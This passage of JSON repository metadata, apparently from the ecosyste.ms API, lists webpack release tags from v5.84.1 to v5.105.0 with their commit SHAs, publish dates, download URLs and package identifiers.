ind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed